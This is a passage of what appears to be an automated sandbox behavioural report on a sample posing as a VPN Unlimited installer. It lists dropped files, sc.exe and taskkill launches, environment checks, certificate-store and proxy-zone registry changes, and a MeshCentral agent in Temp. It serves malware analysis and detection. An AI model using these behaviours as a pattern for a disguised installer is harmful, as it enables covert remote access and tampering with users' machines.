| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\is-3CBFL.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\is-IKQDV.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-K30FS.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-HB76B.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | C:\Windows\SysWOW64\WerFault.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\taskkill.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a32ab69f77c0b699954b90cb84dabca5 |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a32ab69f77c0b699954b90cb84dabca5 |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-JFEMB.tmp\VC_redist.x64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Temp\{89C18D32-D6C3-4330-A467-E30AB2ACED1E}\.cr\VC_redist.x64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a32ab69f77c0b699954b90cb84dabca5 | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Install(4).exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited_v9.3.2_64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Temp\{EFD9F19E-3118-4812-952D-3DDA554BA588}\.be\VC_redist.x64.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = … | C:\Windows\system32\vssvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\dialer.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" | C:\Windows\system32\sihost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\vpnunlimited\URL Protocol | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\vpnunlimited\shell\open | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\vpnunlimited\shell\open\command\ = "\"C:\\Program Files (x86)\\VPN Unlimited\\vpn-unlimited-launcher.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\vpnunlimited | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
